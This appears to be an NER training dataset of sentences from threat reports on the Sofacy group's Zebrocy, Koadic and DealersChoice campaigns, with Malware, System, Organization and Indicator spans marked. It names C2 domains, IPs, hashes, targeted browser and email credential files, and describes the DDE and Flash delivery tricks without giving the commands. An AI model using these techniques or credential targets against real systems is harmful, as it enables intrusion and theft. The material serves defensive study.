{"text": "As we explained in our most recent blogpost about Zebrocy , the configuration of the backdoor is stored in in the resource section and is split into four different hex-encoded , encrypted blobs .", "spans": [{"start": 50, "end": 57, "label": "Malware"}]}
{"text": "These blobs contain the different parts of the configuration .", "spans": []}
{"text": "Once the backdoor sends basic information about its newly compromised system , the operators take control of the backdoor and start to send commands right away .", "spans": []}
{"text": "Hence , the time between the victim running the downloader and the operators \u2019 first commands is only a few minutes .", "spans": []}
{"text": "In this section we describe in more detail the commands performed manually by the operators through their Delphi backdoor .", "spans": [{"start": 106, "end": 112, "label": "System"}]}
{"text": "The commands available are located in one of the configuration blobs mentioned earlier .", "spans": []}
{"text": "The number of supported commands has increased over time , with the latest version of the backdoor having more than thirty .", "spans": []}
{"text": "As we did not identify a pattern in the order which the commands are invoked , we believe the operators are executing them manually .", "spans": []}
{"text": "The first set of commands gathers information about the victim \u2019s computer and environment :", "spans": []}
{"text": "Commands Arguments SCREENSHOT None SYS_INFO None GET_NETWORK None SCAN_ALL None .", "spans": []}
{"text": "The commands above are commonly executed when the operators first connect to a newly activated backdoor .", "spans": []}
{"text": "They don\u2019t have any arguments , and they are quite self-explanatory .", "spans": []}
{"text": "Other commands commonly seen executed shortly after these backdoors are activated .", "spans": []}
{"text": "Those who already have read our previous articles about Zebrocy will notice that more or less the same kind of information is sent , over and over again by previous stages .", "spans": [{"start": 56, "end": 63, "label": "Malware"}]}
{"text": "This information is requested within a few minutes of initial compromise and the amount of data the operator will have to deal with is quite considerable .", "spans": []}
{"text": "In order to collect even more information , from time to time the Zebrocy operators upload and use dumpers on victims \u2019 machines .", "spans": [{"start": 66, "end": 73, "label": "Malware"}]}
{"text": "The current dumpers have some similarities with those previously used by the group .", "spans": []}
{"text": "In this case , Yandex Browser , Chromium , 7Star Browser ( a Chromium-based browser ) , and CentBrowser are targeted , as well as versions of Microsoft Outlook from 1997 through 2016 .", "spans": [{"start": 15, "end": 29, "label": "System"}, {"start": 32, "end": 40, "label": "System"}, {"start": 43, "end": 56, "label": "System"}, {"start": 61, "end": 83, "label": "System"}, {"start": 92, "end": 103, "label": "System"}, {"start": 142, "end": 151, "label": "Organization"}, {"start": 152, "end": 159, "label": "System"}]}
{"text": "These dumpers create log files indicating the presence or absence of potential databases to dump :", "spans": []}
{"text": "Command Arguments DOWNLOAD_LIST C:\\ProgramData\\Office\\MS\\out.txt , C:\\ProgramData\\Office\\MS\\text.txt .", "spans": [{"start": 32, "end": 64, "label": "Indicator"}, {"start": 67, "end": 100, "label": "Indicator"}]}
{"text": "These dumpers are quickly removed once they have done their job .", "spans": []}
{"text": "Moreover , the backdoor contains a list of filenames related to credentials from software listed below ( database names ) :", "spans": []}
{"text": "key3.db Firefox private keys ( now named key4.db ) cert8.db Firefox certificate database logins.json Firefox encrypted password database account.cfn The Bat ! ( email client ) account credentials wand.dat Opera password database .", "spans": [{"start": 0, "end": 7, "label": "Indicator"}, {"start": 8, "end": 15, "label": "System"}, {"start": 41, "end": 48, "label": "Indicator"}, {"start": 51, "end": 59, "label": "Indicator"}, {"start": 60, "end": 67, "label": "System"}, {"start": 89, "end": 100, "label": "Indicator"}, {"start": 101, "end": 108, "label": "System"}, {"start": 137, "end": 148, "label": "Indicator"}, {"start": 161, "end": 166, "label": "System"}, {"start": 196, "end": 204, "label": "Indicator"}, {"start": 205, "end": 210, "label": "System"}]}
{"text": "The operators retrieve these files on the machine using the DOWNLOAD_LIST command .", "spans": []}
{"text": "This command can be used when the operators are aware of the presence of interesting files on the computer .", "spans": []}
{"text": "Finally , depending on how interesting the victim is , they malware operators may deploy another custom backdoor .", "spans": []}
{"text": "This backdoor is executed using the CMD_EXECUTE command .", "spans": []}
{"text": "There are some interesting facts here .", "spans": []}
{"text": "First , they use COM object hijacking to make the malware persistent on the system even though the custom backdoor is installed only for a few hours .", "spans": [{"start": 17, "end": 20, "label": "System"}]}
{"text": "Second , the hex-encoded string is the C&C used by the custom backdoor while in the Delphi backdoor the C&C is embedded in the configuration .", "spans": [{"start": 39, "end": 42, "label": "System"}, {"start": 84, "end": 90, "label": "System"}, {"start": 104, "end": 107, "label": "System"}]}
{"text": "Sofacy Group\u2019s Parallel Attacks .", "spans": [{"start": 0, "end": 6, "label": "Organization"}]}
{"text": "The Sofacy group remains a persistent global threat .", "spans": [{"start": 4, "end": 10, "label": "Organization"}]}
{"text": "Unit 42 and others have shown in the first half of 2018 how this threat actor group continues to target multiple organizations throughout the world with a strong emphasis on government , diplomatic and other strategic organizations primarily in North America and Europe .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]}
{"text": "Following up our most recent Sofacy research in February and March of 2018 , we have found a new campaign that uses a lesser known tool widely attributed to the Sofacy group called Zebrocy .", "spans": [{"start": 29, "end": 35, "label": "Organization"}, {"start": 161, "end": 167, "label": "Organization"}, {"start": 181, "end": 188, "label": "Malware"}]}
{"text": "Zebrocy is delivered primarily via phishing attacks that contain malicious Microsoft Office documents with macros as well as simple executable file attachments .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 75, "end": 84, "label": "Organization"}, {"start": 85, "end": 91, "label": "Organization"}]}
{"text": "This third campaign is consistent with two previously reported attack campaigns in terms of targeting : the targets were government organizations dealing with foreign affairs .", "spans": []}
{"text": "In this case however the targets were in different geopolitical regions .", "spans": []}
{"text": "An interesting difference we found in this newest campaign was that the attacks using Zebrocy cast a far wider net within the target organization : the attackers sent phishing emails to a an exponentially larger number of individuals .", "spans": [{"start": 86, "end": 93, "label": "Malware"}, {"start": 176, "end": 182, "label": "System"}]}
{"text": "The targeted individuals did not follow any significant pattern , and the email addresses were found easily using web search engines .", "spans": [{"start": 74, "end": 79, "label": "System"}]}
{"text": "This is a stark contrast with other attacks commonly associated with the Sofacy group where generally no more than a handful of victims are targeted within a single organization in a focus-fire style of attack .", "spans": [{"start": 73, "end": 79, "label": "Organization"}]}
{"text": "In addition to the large number of Zebrocy attacks we discovered , we also observed instances of the Sofacy group leveraging the Dynamic Data Exchange ( DDE ) exploit technique previously documented by McAfee .", "spans": [{"start": 35, "end": 42, "label": "Malware"}, {"start": 101, "end": 107, "label": "Organization"}, {"start": 129, "end": 150, "label": "Indicator"}, {"start": 153, "end": 156, "label": "Indicator"}, {"start": 202, "end": 208, "label": "Organization"}]}
{"text": "The instances we observed , however , used the DDE exploit to deliver different payloads than what was observed previously .", "spans": []}
{"text": "In one instance the DDE attack was used to deliver and install Zebrocy .", "spans": [{"start": 20, "end": 23, "label": "Indicator"}, {"start": 63, "end": 70, "label": "Malware"}]}
{"text": "In another instance , the DDE attack was used to deliver an open-source penetration testing toolkit called Koadic .", "spans": [{"start": 26, "end": 29, "label": "Indicator"}, {"start": 107, "end": 113, "label": "System"}]}
{"text": "The Sofacy group has leveraged open source or freely available tools and exploits in the past but this is the first time that Unit 42 has observed them leveraging the Koadic toolkit .", "spans": [{"start": 4, "end": 10, "label": "Organization"}, {"start": 126, "end": 133, "label": "Organization"}, {"start": 167, "end": 173, "label": "System"}]}
{"text": "In our February report , we discovered the Sofacy group using Microsoft Office documents with malicious macros to deliver the SofacyCarberp payload to multiple government entities .", "spans": [{"start": 43, "end": 49, "label": "Organization"}, {"start": 62, "end": 71, "label": "Organization"}, {"start": 72, "end": 78, "label": "Organization"}, {"start": 126, "end": 139, "label": "Malware"}]}
{"text": "In that report , we documented our observation that the Sofacy group appeared to use conventional obfuscation techniques to mask their infrastructure attribution by using random registrant and service provider information for each of their attacks .", "spans": [{"start": 56, "end": 62, "label": "Organization"}]}
{"text": "In particular , we noted that the Sofacy group deployed a webpage on each of the domains .", "spans": [{"start": 34, "end": 40, "label": "Organization"}]}
{"text": "This is odd because attackers almost never set up an actual webpage on adversary C2 infrastructure .", "spans": [{"start": 81, "end": 83, "label": "System"}]}
{"text": "Even stranger , each webpage contained the same content within the body .", "spans": []}
{"text": "Since that report , we continued our research into this oddity .", "spans": []}
{"text": "Using this artifact , we were able to pivot and discover another attack campaign using the DealersChoice exploit kit with similar victimology to what we saw in February .", "spans": [{"start": 91, "end": 104, "label": "System"}]}
{"text": "Continuing to use this artifact , we discovered another domain with the same content body , supservermgr.com .", "spans": []}
{"text": "This domain was registered on December 20 , 2017 and within a few days was resolving to 92.222.136.105 , which belonged to a well-known VPS provider often used by the Sofacy group .", "spans": [{"start": 88, "end": 102, "label": "Indicator"}, {"start": 136, "end": 139, "label": "System"}, {"start": 167, "end": 173, "label": "Organization"}]}
{"text": "Unfortunately , at the time of collection , the C2 domain had been sinkholed by a third party .", "spans": [{"start": 48, "end": 50, "label": "System"}]}
{"text": "Based on dynamic and static analysis of the malware sample associated with the supservermgr.com domain however , we were able to determine several unique artifacts which allowed us to expand our dataset and discover additional findings .", "spans": [{"start": 79, "end": 95, "label": "Indicator"}]}
{"text": "First , we determined the sample we collected , d697160aecf152a81a89a6b5a7d9e1b8b5e121724038c676157ac72f20364edc was attempting to communicate to its C2 at http://supservermgr.com/sys/upd/pageupd.php to retrieve a Zebrocy AutoIT downloader .", "spans": [{"start": 48, "end": 112, "label": "Indicator"}, {"start": 150, "end": 152, "label": "System"}, {"start": 156, "end": 199, "label": "Indicator"}, {"start": 214, "end": 221, "label": "Malware"}, {"start": 222, "end": 228, "label": "System"}]}
{"text": "Because the domain had been sinkholed , this activity could not be completed .", "spans": []}
{"text": "Using AutoFocus , we pivoted from the user agent string to expand our data set to three additional Zebrocy samples using the exact same user agent .", "spans": [{"start": 6, "end": 15, "label": "System"}, {"start": 99, "end": 106, "label": "Malware"}]}
{"text": "This led us to additional infrastructure for Zebrocy at 185.25.51.198 and 185.25.50.93 .", "spans": [{"start": 45, "end": 52, "label": "Malware"}, {"start": 56, "end": 69, "label": "Indicator"}, {"start": 74, "end": 86, "label": "Indicator"}]}
{"text": "At this point we had collected nearly thirty samples of Zebrocy in relation to the original sample and its associated C2 domain .", "spans": [{"start": 56, "end": 63, "label": "Malware"}, {"start": 118, "end": 120, "label": "System"}]}
{"text": "Additional pivoting based on artifacts unique to this malware family expanded our dataset to hundreds of samples used over the last several years .", "spans": []}
{"text": "Most of the additional samples were the Delphi and AutoIT variants as reported by ESET .", "spans": [{"start": 40, "end": 46, "label": "System"}, {"start": 51, "end": 57, "label": "System"}, {"start": 82, "end": 86, "label": "Organization"}]}
{"text": "However , several of the collected samples were a C++ variant of the Zebrocy downloader tool .", "spans": [{"start": 50, "end": 53, "label": "System"}, {"start": 69, "end": 76, "label": "Malware"}]}
{"text": "In addition , we discovered evidence of a completely different payload in Koadic being delivered as well .", "spans": [{"start": 74, "end": 80, "label": "System"}]}
{"text": "Also , we found the IP address 185.25.50.93 hosting C2 services for a Delphi backdoor that ESET \u2019s report states is the final stage payload for these attacks .", "spans": [{"start": 31, "end": 43, "label": "Indicator"}, {"start": 52, "end": 54, "label": "System"}, {"start": 70, "end": 76, "label": "System"}, {"start": 91, "end": 95, "label": "Organization"}]}
{"text": "Please note this is not a comprehensive chart of all Zebrocy and Koadic samples we were able to collect .", "spans": [{"start": 53, "end": 60, "label": "Malware"}]}
{"text": "Only samples mentioned or relevant to the relational analysis have been included .", "spans": []}
{"text": "From the 185.25.50.93 C2 IP , we discovered another hard-coded user agent being used by Zebrocy :", "spans": [{"start": 9, "end": 21, "label": "Indicator"}, {"start": 22, "end": 24, "label": "System"}, {"start": 88, "end": 95, "label": "Malware"}]}
{"text": "Mozilla ( Windows NT 6.1 ; WOW64 ) WinHttp/1.6.3.8 ( WinHTTP/5.1 ) like Gecko .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 17, "label": "System"}, {"start": 72, "end": 77, "label": "System"}]}
{"text": "We observed several samples of Zebrocy using this user agent targeting the foreign affairs ministry of a large Central Asian nation .", "spans": [{"start": 31, "end": 38, "label": "Malware"}]}
{"text": "Pivoting off of this artifact provided us additional Zebrocy samples .", "spans": [{"start": 53, "end": 60, "label": "Malware"}]}
{"text": "One sample in particular , cba5ab65a24be52214736bc1a5bc984953a9c15d0a3826d5b15e94036e5497df used yet another unique user agent string in combination with the previous user agent for its C2 : Mozilla v5.1 ( Windows NT 6.1 ; rv : 6.0.1 ) Gecko Firefox .", "spans": [{"start": 27, "end": 91, "label": "Indicator"}, {"start": 186, "end": 188, "label": "System"}, {"start": 191, "end": 198, "label": "Organization"}, {"start": 206, "end": 213, "label": "System"}, {"start": 236, "end": 241, "label": "System"}, {"start": 242, "end": 249, "label": "System"}]}
{"text": "A malware sample using two separate unique user agent strings is uncommon .", "spans": []}
{"text": "A closer examination of the tool revealed the second user agent string was from a secondary payload that was retrieved by the cba5ab65a24be52214736bc1a5bc984953a9c15d0a3826d5b15e94036e5497df sample .", "spans": [{"start": 126, "end": 190, "label": "Indicator"}]}
{"text": "Pivoting from the Mozilla v5.1 user agent revealed over forty additional Zebrocy samples , with several again targeting the same Central Asian nation .", "spans": [{"start": 18, "end": 25, "label": "Organization"}, {"start": 73, "end": 80, "label": "Malware"}]}
{"text": "Two samples specifically , 25f0d1cbcc53d8cfd6d848e12895ce376fbbfaf279be591774b28f70852a4fd8 and 115fd8c619fa173622c7a1e84efdf6fed08a25d3ca3095404dcbd5ac3deb1f03 provided additional artifacts we were able to pivot from to discover weaponized documents to deliver Zebrocy as well as a Koadic .", "spans": [{"start": 27, "end": 91, "label": "Indicator"}, {"start": 96, "end": 160, "label": "Indicator"}, {"start": 262, "end": 269, "label": "Malware"}, {"start": 283, "end": 289, "label": "System"}]}
{"text": "Examining the use of the unique user agents \u2019 strings over time shows that while previously only the Mozilla user agent was in use , since mid 2017 all three user agent strings have been used by the Zebrocy tool for its C2 communications .", "spans": [{"start": 101, "end": 108, "label": "Organization"}, {"start": 199, "end": 206, "label": "Malware"}, {"start": 220, "end": 222, "label": "System"}]}
{"text": "The two weaponized documents we discovered leveraging DDE were of particular interest due to victimology and a change in tactics .", "spans": []}
{"text": "While examining 25f0d1cbcc53d8cfd6d848e12895ce376fbbfaf279be591774b28f70852a4fd8 , we were able to pivot from its C2", "spans": [{"start": 16, "end": 80, "label": "Indicator"}, {"start": 114, "end": 116, "label": "System"}]}
{"text": "220.158.216.127 to gather additional Zebrocy samples as well as a weaponized document .", "spans": [{"start": 0, "end": 15, "label": "Indicator"}, {"start": 37, "end": 44, "label": "Malware"}]}
{"text": "This document 85da72c7dbf5da543e10f3f806afd4ebf133f27b6af7859aded2c3a6eced2fd5 appears to have been targeting a North American government organization dealing with foreign affairs .", "spans": [{"start": 14, "end": 78, "label": "Indicator"}]}
{"text": "It leveraged DDE to retrieve and install a payload onto the victim host .", "spans": [{"start": 13, "end": 16, "label": "Indicator"}]}
{"text": "A decoy document is deployed in this attack , with the contents purporting be a publicly available document from the United Nations regarding the Republic of Uzbekistan .", "spans": []}
{"text": "The creator of the weaponized document appended their DDE instructions to the end of the document after all of the decoy contents .", "spans": []}
{"text": "When the document is opened in Word , the instructions are not immediately visible , as Word does not display these fields contents by default .", "spans": [{"start": 31, "end": 35, "label": "System"}, {"start": 88, "end": 92, "label": "System"}]}
{"text": "As you can see in the following screenshot , simply attempting to highlight the lines in which the DDE instructions reside does not display them .", "spans": [{"start": 99, "end": 102, "label": "Indicator"}]}
{"text": "Enabling the \u201c Toggle Field Codes \u201d feature reveals the DDE instructions to us and shows that the author had set instructions to size 1 font and with a white coloring .", "spans": [{"start": 56, "end": 59, "label": "Indicator"}]}
{"text": "The use of a white font coloring to hide contents within a weaponized document is a technique we had previously reported being used by the Sofacy group in a malicious macro attack .", "spans": [{"start": 139, "end": 145, "label": "Organization"}]}
{"text": "The DDE instructions attempt to run the following the following command on the victim host , which attempts to download and execute a payload from a remote server .", "spans": [{"start": 4, "end": 7, "label": "Indicator"}]}
{"text": "During our analysis , we observed this DDE downloading and executing a Zebrocy AutoIt downloader f27836430742c9e014e1b080d89c47e43db299c2e00d0c0801a2830b41b57bc1 , configured to attempt to download an additional payload from 220.158.216.127 .", "spans": [{"start": 39, "end": 42, "label": "Indicator"}, {"start": 71, "end": 78, "label": "Malware"}, {"start": 79, "end": 85, "label": "System"}, {"start": 97, "end": 161, "label": "Indicator"}, {"start": 225, "end": 240, "label": "Indicator"}]}
{"text": "The DDE instructions also included another command that it did not run , which suggests it is an artifact of a prior version of this delivery document .", "spans": [{"start": 4, "end": 7, "label": "Indicator"}]}
{"text": "The following shows this unused command , which exposed an additional server within Sofacy \u2019s infrastructure would download and execute an encoded PowerShell script from 92.114.92.102 .", "spans": [{"start": 84, "end": 90, "label": "Organization"}, {"start": 147, "end": 157, "label": "System"}, {"start": 170, "end": 183, "label": "Indicator"}]}
{"text": "The unused command above appears to be related to previous attacks , specifically attacks that occurred in November 2017 as discussed by McAfee and ESET .", "spans": [{"start": 137, "end": 143, "label": "Organization"}, {"start": 148, "end": 152, "label": "Organization"}]}
{"text": "The payload delivered in these November 2017 attacks using DDE enabled documents was SofacyCarberp , which differs from the Zebrocy downloader delivered in the February 2018 attacks . 115fd8c619fa173622c7a1e84efdf6fed08a25d3ca3095404dcbd5ac3deb1f03 was another Zebrocy sample we were able to pivot from by gathering additional samples connecting to its C2 86.106.131.177 .", "spans": [{"start": 59, "end": 62, "label": "Indicator"}, {"start": 85, "end": 98, "label": "Malware"}, {"start": 124, "end": 131, "label": "Malware"}, {"start": 184, "end": 248, "label": "Indicator"}, {"start": 261, "end": 268, "label": "Malware"}, {"start": 353, "end": 355, "label": "System"}, {"start": 356, "end": 370, "label": "Indicator"}]}
{"text": "The additional samples targeted the same large Central Asian nation state as previously mentioned but more interestingly , one of the samples was a weaponized document also leveraging DDE and containing a non-Zebrocy payload .", "spans": [{"start": 184, "end": 187, "label": "Indicator"}]}
{"text": "The payload turned out to be an open source penetration test toolkit called Koadic .", "spans": []}
{"text": "It is a toolkit similar to Metasploit or PowerShell Empire and is freely available to anyone on Github .", "spans": [{"start": 27, "end": 37, "label": "System"}, {"start": 41, "end": 51, "label": "System"}, {"start": 52, "end": 58, "label": "System"}, {"start": 96, "end": 102, "label": "System"}]}
{"text": "The RTF document 8cf3bc2bf36342e844e9c8108393562538a9af2a1011c80bb46416c0572c86ff was very small in size at 264 bytes .", "spans": [{"start": 4, "end": 7, "label": "System"}, {"start": 17, "end": 81, "label": "Indicator"}]}
{"text": "The contents above use the DDE functionality in Microsoft Word to run a PowerShell script to download the Koadic payload from a remote server , save it as an executable file on the system and then execute the payload .", "spans": [{"start": 27, "end": 30, "label": "Indicator"}, {"start": 48, "end": 57, "label": "Organization"}, {"start": 58, "end": 62, "label": "System"}, {"start": 72, "end": 82, "label": "System"}, {"start": 106, "end": 112, "label": "System"}]}
{"text": "The Sofacy group continues their targeted attack campaigns in 2018 .", "spans": [{"start": 4, "end": 10, "label": "Organization"}]}
{"text": "As mentioned in this blog , Sofacy is carrying out parallel campaigns to attack similar targets around the world but with different toolsets .", "spans": [{"start": 28, "end": 34, "label": "Organization"}]}
{"text": "The Zebrocy tool associated with this current strain of attacks is constructed in several different forms based on the programming language the developer chose to create the tool .", "spans": [{"start": 4, "end": 11, "label": "Malware"}]}
{"text": "We have observed Delphi , AutoIt , and C++ variants of Zebrocy , all of which are related not only in their functionality , but also at times by chaining the variants together in a single attack .", "spans": [{"start": 17, "end": 23, "label": "System"}, {"start": 26, "end": 32, "label": "System"}, {"start": 39, "end": 42, "label": "System"}, {"start": 55, "end": 62, "label": "Malware"}]}
{"text": "These attacks are still largely perpetrated via spear phishing campaigns , whether via simple executable attachments in hopes that a victim will launch the file to using a previously observed DDE exploitation technique .", "spans": [{"start": 192, "end": 195, "label": "Indicator"}]}
{"text": "Sofacy Uses DealersChoice to Target European Government Agency .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 12, "end": 25, "label": "System"}]}
{"text": "Back in October 2016 , Unit 42 published an initial analysis on a Flash exploitation framework used by the Sofacy threat group called DealersChoice .", "spans": [{"start": 66, "end": 71, "label": "System"}, {"start": 107, "end": 113, "label": "Organization"}, {"start": 134, "end": 147, "label": "System"}]}
{"text": "The attack consisted of Microsoft Word delivery documents that contained Adobe Flash objects capable of loading additional malicious Flash objects embedded in the file or directly provided by a command and control server .", "spans": [{"start": 24, "end": 33, "label": "Organization"}, {"start": 34, "end": 38, "label": "System"}, {"start": 73, "end": 78, "label": "Organization"}, {"start": 79, "end": 84, "label": "System"}, {"start": 133, "end": 138, "label": "System"}]}
{"text": "Sofacy continued to use DealersChoice throughout the fall of 2016 , which we also documented in our December 2016 publication discussing Sofacy \u2019s larger campaign .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 24, "end": 37, "label": "System"}, {"start": 137, "end": 143, "label": "Organization"}]}
{"text": "On March 12 and March 14 , we observed the Sofacy group carrying out an attack on a European government agency involving an updated variant of DealersChoice .", "spans": [{"start": 43, "end": 49, "label": "Organization"}, {"start": 143, "end": 156, "label": "System"}]}
{"text": "The updated DealersChoice documents used a similar process to obtain a malicious Flash object from a C2 server , but the inner mechanics of the Flash object contained significant differences in comparison to the original samples we analyzed .", "spans": [{"start": 12, "end": 25, "label": "System"}, {"start": 81, "end": 86, "label": "System"}, {"start": 101, "end": 103, "label": "System"}, {"start": 144, "end": 149, "label": "System"}]}
{"text": "One of the differences was a particularly clever evasion technique : to our knowledge this has never been observed in use .", "spans": []}
{"text": "With the previous iterations of DealersChoice samples , the Flash object would immediately load and begin malicious tasks .", "spans": [{"start": 32, "end": 45, "label": "System"}, {"start": 60, "end": 65, "label": "System"}]}
{"text": "In the March attacks , the Flash object is only loaded if the user scrolls through the entire content of the delivery document and views the specific page the Flash object is embedded on .", "spans": [{"start": 27, "end": 32, "label": "System"}, {"start": 159, "end": 164, "label": "System"}]}
{"text": "Also , DealersChoice requires multiple interactions with an active C2 server to successfully exploit an end system .", "spans": [{"start": 7, "end": 20, "label": "System"}, {"start": 67, "end": 69, "label": "System"}]}
{"text": "The overall process to result in a successful exploitation is :", "spans": []}
{"text": "User must open the Microsoft Word email attachment ;", "spans": [{"start": 19, "end": 28, "label": "Organization"}, {"start": 29, "end": 33, "label": "System"}, {"start": 34, "end": 39, "label": "System"}]}
{"text": "User must scroll to page three of the document , which will run the DealersChoice Flash object ;", "spans": [{"start": 68, "end": 81, "label": "System"}, {"start": 82, "end": 87, "label": "System"}]}
{"text": "The Flash object must contact an active C2 server to download an additional Flash object containing exploit code ;", "spans": [{"start": 4, "end": 9, "label": "System"}, {"start": 40, "end": 42, "label": "System"}, {"start": 76, "end": 81, "label": "System"}]}
{"text": "The initial Flash object must contact the same C2 server to download a secondary payload ;", "spans": [{"start": 12, "end": 17, "label": "System"}, {"start": 47, "end": 49, "label": "System"}]}
{"text": "Victim host must have a vulnerable version of Flash installed .", "spans": [{"start": 46, "end": 51, "label": "System"}]}
{"text": "The attack involving this updated variant of DealersChoice was targeting a European government organization .", "spans": [{"start": 45, "end": 58, "label": "System"}]}
{"text": "The attack relied on a spear-phishing email with a subject of \u201c Defence & Security 2018 Conference Agenda \u201d that had an attachment with a filename of \u201c Defence&Security_2018_Conference_Agenda.docx \u201d .", "spans": [{"start": 38, "end": 43, "label": "System"}, {"start": 152, "end": 196, "label": "Indicator"}]}
{"text": "The attached document contains a conference agenda that the Sofacy group appears to have copied directly from the website for the \u201c Underwater Defence & Security 2018 Conference \u201d here .", "spans": [{"start": 60, "end": 66, "label": "Organization"}]}
{"text": "Opening the attached \u201c Defence & Security 2018 Conference Agenda.docx \u201d file does not immediately run malicious code to exploit the system .", "spans": [{"start": 23, "end": 69, "label": "Indicator"}]}
{"text": "Instead , the user must scroll to the third page of the document , which will load a Flash object that contains ActionScript that will attempt to exploit the user \u2019s system to install a malicious payload .", "spans": [{"start": 85, "end": 90, "label": "System"}, {"start": 112, "end": 124, "label": "System"}]}
{"text": "The Flash object embedded within this delivery document is a variant of an exploit tool that we call DealersChoice .", "spans": [{"start": 4, "end": 9, "label": "System"}, {"start": 101, "end": 114, "label": "System"}]}
{"text": "This suggests that the Sofacy group is confident that the targeted individuals would be interested enough in the content to peruse through it .", "spans": [{"start": 23, "end": 29, "label": "Organization"}]}
{"text": "We analyzed the document to determine the reason that the malicious Flash object only ran when the user scrolled to the third page .", "spans": [{"start": 68, "end": 73, "label": "System"}]}
{"text": "According to the document.xml file , the DealersChoice loader SWF exists after the \u201c covert-shores-small.png \u201d image file within the delivery document .", "spans": [{"start": 17, "end": 29, "label": "Indicator"}, {"start": 41, "end": 54, "label": "System"}, {"start": 62, "end": 65, "label": "System"}, {"start": 85, "end": 108, "label": "Indicator"}]}
{"text": "This image file exists on the third page of the document , so the user would have to scroll down in the document to this third page to get the SWF file to run .", "spans": [{"start": 143, "end": 146, "label": "System"}]}
{"text": "The user may not notice the Flash object on the page , as Word displays it as a tiny black box in the document , as seen in Figure 1 .", "spans": [{"start": 28, "end": 33, "label": "System"}, {"start": 58, "end": 62, "label": "System"}]}
{"text": "This is an interesting anti-sandbox technique , as it requires human interaction prior to the document exhibiting any malicious activity .", "spans": []}
{"text": "This DealersChoice Flash object shares a similar process to previous variants ; however , it appears that the Sofacy actors have made slight changes to its internal code .", "spans": [{"start": 5, "end": 18, "label": "System"}, {"start": 19, "end": 24, "label": "System"}, {"start": 110, "end": 116, "label": "Organization"}]}
{"text": "Also , it appears that the actors used ActionScript from an open source video player called \u201c f4player \u201d , which is freely available on GitHub .", "spans": [{"start": 39, "end": 51, "label": "System"}, {"start": 94, "end": 102, "label": "System"}, {"start": 136, "end": 142, "label": "System"}]}
{"text": "The Sofacy developer modified the f4player \u2019s ActionScript to include additional code to load an embedded Flash object .", "spans": [{"start": 4, "end": 10, "label": "Organization"}, {"start": 34, "end": 42, "label": "System"}, {"start": 46, "end": 58, "label": "System"}, {"start": 106, "end": 111, "label": "System"}]}
{"text": "The additions include code to decrypt an embedded Flash object and an event handler that calls a newly added function ( \u201c skinEvent2 \u201d ) that plays the decrypted object .", "spans": [{"start": 50, "end": 55, "label": "System"}]}
{"text": "The above code allows DealersChoice to load a second SWF object , specifically loading it with an argument that includes a C2 URL of \u201c http://ndpmedia24.com/0pq6m4f.m3u8 \u201d .", "spans": [{"start": 22, "end": 35, "label": "System"}, {"start": 53, "end": 56, "label": "System"}, {"start": 123, "end": 125, "label": "System"}, {"start": 135, "end": 169, "label": "Indicator"}]}
{"text": "The embedded SWF extracts the domain from the C2 URL passed to it and uses it to craft a URL to get the server \u2019s \u2018 crossdomain.xml \u2019 file in order to obtain permissions to load additional Flash objects from the C2 domain .", "spans": [{"start": 13, "end": 16, "label": "System"}, {"start": 46, "end": 48, "label": "System"}, {"start": 116, "end": 131, "label": "Indicator"}, {"start": 189, "end": 194, "label": "System"}, {"start": 212, "end": 214, "label": "System"}]}
{"text": "The ActionScript relies on event listeners to call specific functions when the event \u201c Event.COMPLETE \u201d is triggered after successful HTTP requests are issued to the C2 server .", "spans": [{"start": 4, "end": 16, "label": "System"}, {"start": 87, "end": 101, "label": "Indicator"}, {"start": 134, "end": 138, "label": "Indicator"}, {"start": 166, "end": 168, "label": "System"}]}
{"text": "The event handlers call functions with the following names , which includes an incrementing number that represents the order in which the functions are called : onload1 , onload2 , onload3 , onload5 .", "spans": []}
{"text": "With these event handlers created , the ActionScript starts by gathering system data from the flash.system.Capabilities.serverString property ( just like in the original DealersChoice.B samples ) and issues an HTTP GET with the system data as a parameter to the C2 URL that was passed as an argument to the embedded SWF when it was initially loaded .", "spans": [{"start": 40, "end": 52, "label": "System"}, {"start": 170, "end": 185, "label": "Indicator"}, {"start": 210, "end": 214, "label": "Indicator"}, {"start": 262, "end": 264, "label": "System"}, {"start": 316, "end": 319, "label": "System"}]}
{"text": "When this HTTP request completes , the event listener will call the \u2018 onload1 \u2019 function .", "spans": [{"start": 10, "end": 14, "label": "Indicator"}]}
{"text": "The \u2018 onload1 \u2019 function parses the response data from the request to the C2 URL using regular expressions .", "spans": [{"start": 74, "end": 76, "label": "System"}]}
{"text": "The regular expressions suggest that the C2 server responds with content that is meant to resemble HTTP Live Steaming ( HLS ) traffic , which is a protocol that uses HTTP to deliver audio and video files for streaming .", "spans": [{"start": 41, "end": 43, "label": "System"}, {"start": 99, "end": 117, "label": "System"}, {"start": 120, "end": 123, "label": "System"}, {"start": 166, "end": 170, "label": "Indicator"}]}
{"text": "The use of HLS coincides with the use of ActionScript code from the f4player to make the traffic seem legitimate .", "spans": [{"start": 11, "end": 14, "label": "System"}, {"start": 41, "end": 53, "label": "System"}, {"start": 68, "end": 76, "label": "System"}]}
{"text": "The variables storing the results of the regular expression matches are used within the ActionScript for further interaction with the C2 server .", "spans": [{"start": 88, "end": 100, "label": "System"}, {"start": 134, "end": 136, "label": "System"}]}
{"text": "The \u2018 onload1 \u2019 function then sends an HTTP GET request to the C2 domain using the value stored in the \u2018 r3 \u2019 variable as a URL .", "spans": [{"start": 39, "end": 43, "label": "Indicator"}, {"start": 63, "end": 65, "label": "System"}]}
{"text": "When this HTTP request completes , the event listener will call the \u2018 onload2 \u2019 function .", "spans": [{"start": 10, "end": 14, "label": "Indicator"}]}
{"text": "The \u2018 onload2 \u2019 function decrypts the response received from the HTTP request issued in \u2018 onload1 \u2019 function .", "spans": [{"start": 65, "end": 69, "label": "Indicator"}]}
{"text": "It does so by calling a sub-function to decrypt the content , using the value stored in the \u2018 r1 \u2019 variable as a key .", "spans": []}
{"text": "The sub-function to decrypt the content skips the first 4 bytes , suggesting that the first four bytes of the downloaded content is in cleartext ( most likely the \u201c FWS \u201d or \u201c CWS \u201d header to look legitimate ) .", "spans": [{"start": 165, "end": 168, "label": "System"}, {"start": 176, "end": 179, "label": "System"}]}
